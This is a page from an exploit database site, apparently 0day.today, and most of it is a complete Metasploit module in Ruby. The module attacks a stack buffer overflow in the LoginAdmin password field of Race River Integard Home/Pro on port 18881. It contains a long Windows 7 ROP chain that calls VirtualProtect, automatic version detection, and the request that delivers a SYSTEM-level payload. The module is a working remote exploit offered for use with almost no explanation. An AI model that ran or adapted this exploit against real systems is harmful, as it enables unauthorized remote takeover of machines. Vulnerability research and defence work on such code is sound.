0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Integard Pro 2.2.0.9026 (Win7 ROP-Code Metasploit Module)
========================================================= Integard Pro 2.2.0.9026 (Win7 ROP-Code Metasploit Module) ========================================================= # Exploit Title: Integard Pro 2.2.0.9026 (Win7 ROP-Code Metasploit Module) # Date: 2010-09-15 # Author: Node # Software Link: http://www.exploit-db.com/application/14941 # Version: Race River Integard Pro 2.2.0.9026, integard32.dll(v.2.0.0.306) # Tested on: Windows 7 x64 Eng # CVE : - class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking # stack bof, seh, universal ret, auto targeting include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Race River Integard Home/Pro LoginAdmin Password Stack Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in Race river's Integard Home/Pro internet content filter HTTP Server. Versions prior to 2.0.0.9037 and 2.2.0.9037 are vulnerable. The administration web page on port 18881 is vulnerable to a remote buffer overflow attack. By sending an long character string in the password field, both the structured exception handler and the saved extended instruction pointer are over written, allowing an attacker to gain control of the application and the underlying operating system remotely. The administration website service runs with SYSTEM privileges, and automatically restarts when it crashes. }, 'Author' => [ 'Lincoln', # original discovery 'Nullthreat', 'rick2600', 'corelanc0d3r', 'jduck', # fleshed out module from advisory 'Node' # Win7 rop-code ], 'License' => MSF_LICENSE, 'Version' => '$Revision: 99999 $', 'References' => [ ['OSVDB', '67909'], ['URL','http://www.corelan.be:8800/advisories.php?id=CORELAN-10-061'], ], 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Payload' => { 'Space' => 1000, 'BadChars' => "\x00\x20\x26\x2f\x3d\x3f\x5c", 'StackAdjustment' => -1500, }, 'Platform' => 'win', 'Privileged' => false, 'Targets' => [ [ 'Automatic Targeting', { 'auto' => true }], [ 'Integard Home 2.0.0.9021', { 'Ret' => 0x0041565E,}], # p/p/r [ 'Integard Pro 2.2.0.9026', { 'Ret' => 0x0040362C,}], # p/p/r [ 'Integard Pro 2.2.0.9026, integard32.dll(v.2.0.0.306) (Windows 7 x64 Eng)', { 'Win7' => true,}] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Sep 07 2010')) register_options( [ Opt::RPORT(18881) ], self.class ) end def exploit rop = [0x10010793].pack('V') # RET rop << rand_text_alpha_upper(20) rop << [0x100106E6].pack('V') # POP ECX # RETN rop << [0xFFB8A378].pack('V') # PUSH ESP # SUB EAX,20 # POP EBX # RETN rop << [0x100109B0].pack('V') # MOV EAX,ECX # RETN rop << [0x10010A2A].pack('V') # SUB EAX,ECX # RETN rop << [0x10010A2A].pack('V') # SUB EAX,ECX # RETN rop << [0x1001274C].pack('V') # CALL EAX # RETN rop << [0x100111B7].pack('V') # ADD ESP,2C # POP ESI # POP EBP # RETN rop << "1111" #VirtualProtect placeholder rop << "2222" #return address placeholder rop << "3333" #lpAddress placeholder rop << "4444" #dwsize placeholder rop << "5555" #flNewProtect placeholder rop << [0x10019005].pack('V') # writable rop << rand_text_alpha_upper(28) rop << [0x100106E6].pack('V') # POP ECX # RETN rop << [0xFFBBA5CE].pack('V') # INC EBX # RETN rop << [0x100109B0].pack('V') # MOV EAX,ECX # RETN rop << [0x10010A2A].pack('V') # SUB EAX,ECX # RETN rop << [0x10010A2A].pack('V') # SUB EAX,ECX # RETN rop << [0x1001274C].pack('V') # CALL EAX # RETN rop << [0x1001274C].pack('V') # CALL EAX # RETN rop << [0x1001274C].pack('V') # CALL EAX # RETN rop << [0x1001274C].pack('V') # CALL EAX # RETN rop << [0x1001274C].pack('V') # CALL EAX # RETN rop << [0x1001274C].pack('V') # CALL EAX # RETN rop << [0x1001274C].pack('V') # CALL EAX # RETN rop << [0x1001274C].pack('V') # CALL EAX # RETN rop << [0x10010EB5].pack('V') # POP EDI # POP ESI # RETN rop << [0x10019005].pack('V') # writable rop << rand_text_alpha_upper(4) rop << [0x100106E6].pack('V') # POP ECX # RETN rop << [0xFFB95B6F].pack('V') # PUSH EBX # SBB BYTE PTR DS:[EDI+5E],BL # POP EBP # MOV EAX,-2 # POP EBX # RETN rop << [0x100109B0].pack('V') # MOV EAX,ECX # RETN rop << [0x10010A2A].pack('V') # SUB EAX,ECX # RETN rop << [0x10010A2A].pack('V') # SUB EAX,ECX # RETN rop << [0x1001274C].pack('V') # CALL EAX # RETN rop << [0x100106E6].pack('V') # POP ECX # RETN rop << [0xFFFFF41C].pack('V') #length to kernel32 rop << [0x100109B0].pack('V') # MOV EAX,ECX # RETN rop << [0x10010A2A].pack('V') # SUB EAX,ECX # RETN rop << [0x10010A2A].pack('V') # SUB EAX,ECX # RETN rop << [0x10012EC7].pack('V') # XCHG EAX,ECX # RETN rop << [0x10010C6B].pack('V') # MOV EBX,ECX # MOV ECX,EAX # MOV EAX,ESI # POP ESI # RETN 10 rop << rand_text_alpha_upper(4) rop << [0x100107E8].pack('V') # POP EAX # POP ESI # RETN rop << rand_text_alpha_upper(16) rop << [0xEFFF2E41].pack('V') # ADD EBX,EBP # RETN rop << rand_text_alpha_upper(4) rop << [0x100106E6].pack('V') # POP ECX # RETN rop << [0xEFFF2E41].pack('V') # ADD EBX,EBP # RETN rop << [0x10010A2A].pack('V') # SUB EAX,ECX # RETN rop << [0x10010A2A].pack('V') # SUB EAX,ECX # RETN rop << [0x1001274C].pack('V') # CALL EAX # RETN rop << [0x10010C69].pack('V') # MOV EDX,EBX # MOV EBX,ECX # MOV ECX,EAX # MOV EAX,ESI # POP ESI # RETN 10 rop << rand_text_alpha_upper(4) rop << [0x100106E6].pack('V') # POP ECX # RETN rop << rand_text_alpha_upper(16) rop << [0xEFFFA79E].pack('V') # XCHG EAX,EBP # POP ESI # POP EBP # POP EDI # POP EBX # POP ECX # RETN rop << [0x100109B0].pack('V') # MOV EAX,ECX # RETN rop << [0x10010A2A].pack('V') # SUB EAX,ECX # RETN rop << [0x10010A2A].pack('V') # SUB EAX,ECX # RETN rop << [0x1001274C].pack('V') # CALL EAX # RETN rop << rand_text_alpha_upper(16) rop << [0x10012EC7].pack('V') # XCHG EAX,ECX # RETN rop << [0x10010C6B].pack('V') # MOV EBX,ECX # MOV ECX,EAX # MOV EAX,ESI # POP ESI # RETN 10 rop << rand_text_alpha_upper(4) rop << [0x100106E6].pack('V') # POP ECX # RETN rop << rand_text_alpha_upper(16) rop << [0xFFB81B31].pack('V') # MOV EAX,EDX # RETN rop << [0x100109B0].pack('V') # MOV EAX,ECX # RETN rop << [0x10010A2A].pack('V') # SUB EAX,ECX # RETN rop << [0x10010A2A].pack('V') # SUB EAX,ECX # RETN rop << [0x1001274C].pack('V') # CALL EAX # RETN rop << [0x100137AB].pack('V') # MOV EAX,DWORD PTR DS:[EAX] # POP ESI # POP EBP # RETN rop << rand_text_alpha_upper(8) rop << [0x10012EC7].pack('V') # XCHG EAX,ECX # RETN rop << [0x10010C69].pack('V') # MOV EDX,EBX # MOV EBX,ECX # MOV ECX,EAX # MOV EAX,ESI # POP ESI # RETN 10 rop << rand_text_alpha_upper(4) rop << [0x100106E6].pack('V') # POP ECX # RETN rop << rand_text_alpha_upper(16) rop << [0xFFFFFE75].pack('V') # length to VP rop << [0x100109B0].pack('V') # MOV EAX,ECX # RETN rop << [0x10010A2A].pack('V') # SUB EAX,ECX # RETN rop << [0x10010A2A].pack('V') # SUB EAX,ECX # RETN rop << [0x10012EC7].pack('V') # XCHG EAX,ECX # RETN rop << [0x10013B9D].pack('V') # MOV EAX,EBX # POP EBX # POP EBP # RETN rop << rand_text_alpha_upper(8) rop << [0x10010A2A].pack('V') # SUB EAX,ECX # RETN rop << [0x10012EC7].pack('V') # XCHG EAX,ECX # RETN rop << [0x10010C6B].pack('V') # MOV EBX,ECX # MOV ECX,EAX # MOV EAX,ESI # POP ESI # RETN 10 rop << rand_text_alpha_upper(4) rop << [0x100106E6].pack('V') # POP ECX # RETN rop << rand_text_alpha_upper(16) rop << [0xFFB81B31].pack('V') # MOV EAX,EDX # RETN rop << [0x100109B0].pack('V') # MOV EAX,ECX # RETN rop << [0x10010A2A].pack('V') # SUB EAX,ECX # RETN rop << [0x10010A2A].pack('V') # SUB EAX,ECX # RETN rop << [0x1001274C].pack('V') # CALL EAX # RETN rop << [0x10012EC7].pack('V') # XCHG EAX,ECX # RETN rop << [0x10013B9D].pack('V') # MOV EAX,EBX # POP EBX # POP EBP # RETN rop << rand_text_alpha_upper(8) rop << [0x1001072D].pack('V') # MOV DWORD PTR DS:[ECX],EAX # POP EBP # RET rop << rand_text_alpha_upper(4) rop << [0x10012EC7].pack('V') # XCHG EAX,ECX # RETN rop << [0x100114C8].pack('V') # ADD EAX,1 # RETN rop << [0x100114C8].pack('V') # ADD EAX,1 # RETN rop << [0x100114C8].pack('V') # ADD EAX,1 # RETN rop << [0x100114C8].pack('V') # ADD EAX,1 # RETN rop << [0x10012EC7].pack('V') # XCHG EAX,ECX # RETN rop << [0x100109B0].pack('V') # MOV EAX,ECX # RETN rop << [0x1001072D].pack('V') # MOV DWORD PTR DS:[ECX],EAX # POP EBP # RET rop << rand_text_alpha_upper(4) rop << [0x10010C6B].pack('V') # MOV EBX,ECX # MOV ECX,EAX # MOV EAX,ESI # POP ESI # RETN 10 rop << rand_text_alpha_upper(4) rop << [0x100106E6].pack('V') # POP ECX # RETN rop << rand_text_alpha_upper(16) rop << [0xFFFFF868].pack('V') # length to shellcode rop << [0x100109B0].pack('V') # MOV EAX,ECX # RETN rop << [0x10010A2A].pack('V') # SUB EAX,ECX # RETN rop << [0x10010A2A].pack('V') # SUB EAX,ECX # RETN rop << [0x10012EC7].pack('V') # XCHG EAX,ECX # RETN rop << [0x10010C69].pack('V') # MOV EDX,EBX # MOV EBX,ECX # MOV ECX,EAX # MOV EAX,ESI # POP ESI # RETN 10 rop << rand_text_alpha_upper(4) rop << [0x100106E6].pack('V') # POP ECX # RETN rop << rand_text_alpha_upper(16) rop << [0xFFB81B31].pack('V') # MOV EAX,EDX # RETN rop << [0x100109B0].pack('V') # MOV EAX,ECX # RETN rop << [0x10010A2A].pack('V') # SUB EAX,ECX # RETN rop << [0x10010A2A].pack('V') # SUB EAX,ECX # RETN rop << [0x1001274C].pack('V') # CALL EAX # RETN rop << [0x10010C69].pack('V') # MOV EDX,EBX # MOV EBX,ECX # MOV ECX,EAX # MOV EAX,ESI # POP ESI # RETN 10 rop << rand_text_alpha_upper(4) rop << [0x10012EC7].pack('V') # XCHG EAX,ECX # RETN rop << rand_text_alpha_upper(16) rop << [0x10010798].pack('V') # ADD DWORD PTR DS:[EAX],EDX # RETN rop << [0x10012EC7].pack('V') # XCHG EAX,ECX # RETN rop << [0x100109B0].pack('V') # MOV EAX,ECX # RETN rop << [0x100137AB].pack('V') # MOV EAX,DWORD PTR DS:[EAX] # POP ESI # POP EBP # RETN rop << rand_text_alpha_upper(8) rop << [0x10012EC7].pack('V') # XCHG EAX,ECX # RETN rop << [0x100114C8].pack('V') # ADD EAX,1 # RETN rop << [0x100114C8].pack('V') # ADD EAX,1 # RETN rop << [0x100114C8].pack('V') # ADD EAX,1 # RETN rop << [0x100114C8].pack('V') # ADD EAX,1 # RETN rop << [0x10012EC7].pack('V') # XCHG EAX,ECX # RETN rop << [0x1001072D].pack('V') # MOV DWORD PTR DS:[ECX],EAX # POP EBP # RET rop << rand_text_alpha_upper(4) rop << [0x10012EC7].pack('V') # XCHG EAX,ECX # RETN rop << [0x100114C8].pack('V') # ADD EAX,1 # RETN rop << [0x100114C8].pack('V') # ADD EAX,1 # RETN rop << [0x100114C8].pack('V') # ADD EAX,1 # RETN rop << [0x100114C8].pack('V') # ADD EAX,1 # RETN rop << [0x10012EC7].pack('V') # XCHG EAX,ECX # RETN rop << [0x10010C6B].pack('V') # MOV EBX,ECX # MOV ECX,EAX # MOV EAX,ESI # POP ESI # RETN 10 rop << rand_text_alpha_upper(4) rop << [0x100106E6].pack('V') # POP ECX # RETN rop << rand_text_alpha_upper(16) rop << [0xFFFFFC18].pack('V') # size (1000) rop << [0x100109B0].pack('V') # MOV EAX,ECX # RETN rop << [0x10010A2A].pack('V') # SUB EAX,ECX # RETN rop << [0x10010A2A].pack('V') # SUB EAX,ECX # RETN rop << [0x10012EC7].pack('V') # XCHG EAX,ECX # RETN rop << [0x10013B9D].pack('V') # MOV EAX,EBX # POP EBX # POP EBP # RETN rop << rand_text_alpha_upper(8) rop << [0x10012EC7].pack('V') # XCHG EAX,ECX # RETN rop << [0x1001072D].pack('V') # MOV DWORD PTR DS:[ECX],EAX # POP EBP # RET rop << rand_text_alpha_upper(4) rop << [0x10012EC7].pack('V') # XCHG EAX,ECX # RETN rop << [0x100114C8].pack('V') # ADD EAX,1 # RETN rop << [0x100114C8].pack('V') # ADD EAX,1 # RETN rop << [0x100114C8].pack('V') # ADD EAX,1 # RETN rop << [0x100114C8].pack('V') # ADD EAX,1 # RETN rop << [0x10012EC7].pack('V') # XCHG EAX,ECX # RETN rop << [0x10010C6B].pack('V') # MOV EBX,ECX # MOV ECX,EAX # MOV EAX,ESI # POP ESI # RETN 10 rop << rand_text_alpha_upper(4) rop << [0x100106E6].pack('V') # POP ECX # RETN rop << rand_text_alpha_upper(16) rop << [0xFFFFFFC0].pack('V') # newprotect(0x40) rop << [0x100109B0].pack('V') # MOV EAX,ECX # RETN rop << [0x10010A2A].pack('V') # SUB EAX,ECX # RETN rop << [0x10010A2A].pack('V') # SUB EAX,ECX # RETN rop << [0x10012EC7].pack('V') # XCHG EAX,ECX # RETN rop << [0x10013B9D].pack('V') # MOV EAX,EBX # POP EBX # POP EBP # RETN rop << rand_text_alpha_upper(8) rop << [0x10012EC7].pack('V') # XCHG EAX,ECX # RETN rop << [0x1001072D].pack('V') # MOV DWORD PTR DS:[ECX],EAX # POP EBP # RET rop << rand_text_alpha_upper(4) rop << [0x10010C6B].pack('V') # MOV EBX,ECX # MOV ECX,EAX # MOV EAX,ESI # POP ESI # RETN 10 rop << rand_text_alpha_upper(4) rop << [0x100106E6].pack('V') # POP ECX # RETN rop << rand_text_alpha_upper(16) rop << [0xFFFFFFF0].pack('V') # length to saved VP on the stack rop << [0x100109B0].pack('V') # MOV EAX,ECX # RETN rop << [0x10010A2A].pack('V') # SUB EAX,ECX # RETN rop << [0x10010A2A].pack('V') # SUB EAX,ECX # RETN rop << [0x10012EC7].pack('V') # XCHG EAX,ECX # RETN rop << [0x10013B9D].pack('V') # MOV EAX,EBX # POP EBX # POP EBP # RETN rop << rand_text_alpha_upper(8) rop << [0x10010A2A].pack('V') # SUB EAX,ECX # RETN rop << [0x10012EC7].pack('V') # XCHG EAX,ECX # RETN rop << [0x10010C6B].pack('V') # MOV EBX,ECX # MOV ECX,EAX # MOV EAX,ESI # POP ESI # RETN 10 rop << rand_text_alpha_upper(4) rop << [0x100106E6].pack('V') # POP ECX # RETN rop << rand_text_alpha_upper(16) rop << [0xEFFF2818].pack('V') # XCHG EAX,ESP # RETN rop << [0x100109B0].pack('V') # MOV EAX,ECX # RETN rop << [0x10010A2A].pack('V') # SUB EAX,ECX # RETN rop << [0x10010A2A].pack('V') # SUB EAX,ECX # RETN rop << [0x10012EC7].pack('V') # XCHG EAX,ECX # RETN rop << [0x10010C69].pack('V') # MOV EDX,EBX # MOV EBX,ECX # MOV ECX,EAX # MOV EAX,ESI # POP ESI # RETN 10 rop << rand_text_alpha_upper(4) rop << [0x100106E6].pack('V') # POP ECX # RETN rop << rand_text_alpha_upper(16) rop << [0xFFB81B31].pack('V') # MOV EAX,EDX # RETN rop << [0x100109B0].pack('V') # MOV EAX,ECX # RETN rop << [0x10010A2A].pack('V') # SUB EAX,ECX # RETN rop << [0x10010A2A].pack('V') # SUB EAX,ECX # RETN rop << [0x1001274C].pack('V') # CALL EAX # RETN rop << [0x10010F0B].pack('V') # CALL EBX # ... mytarget = nil if (target['auto']) print_status("Automatically detecting the target...") response = send_request_raw( { 'uri' => '/banner.jpg', 'version' => '1.1', 'method' => 'GET' }, 5) case response['Content-Length'].to_i when 24584 print_status("[!] Found Version - Integard Home") mytarget = targets[1] when 23196 mytarget = targets[2] print_status("[!] Found Version - Integard Pro") end else mytarget = target end if not mytarget raise RuntimeError, "Unable to automatically detect the target version" end print_status("Selected Target: #{mytarget.name}") print_status("Building Buffer") pay = payload.encoded if (target['Win7']) buffer = rand_text_alpha_upper(832) buffer << rop buffer << rand_text_alpha_upper(2000 - rop.length) buffer << pay buffer << rand_text_alpha_upper(1000 - pay.length) else buffer = '' buffer << rand_text_alpha_upper(3091 - pay.length) buffer << pay buffer << "\xE9\x2B\xF8\xFF\xFF" buffer << "\xEB\xF9\x90\x90" buffer << [mytarget.ret].pack('V') end print_status("Sending Request") send_request_raw({ 'uri' => '/LoginAdmin', 'version' => '1.1', 'method' => 'POST', 'headers' => { 'Host' => '192.168.1.1:18881', 'Content-Length' => 1074 }, 'data' => "Password=" + buffer + "&Redirect=%23%23%23REDIRECT%23%23%23&NoJs=0&LoginButtonName=Login" }, 5) print_status("Request Sent") handler end end # 0day.today [2024-12-24] #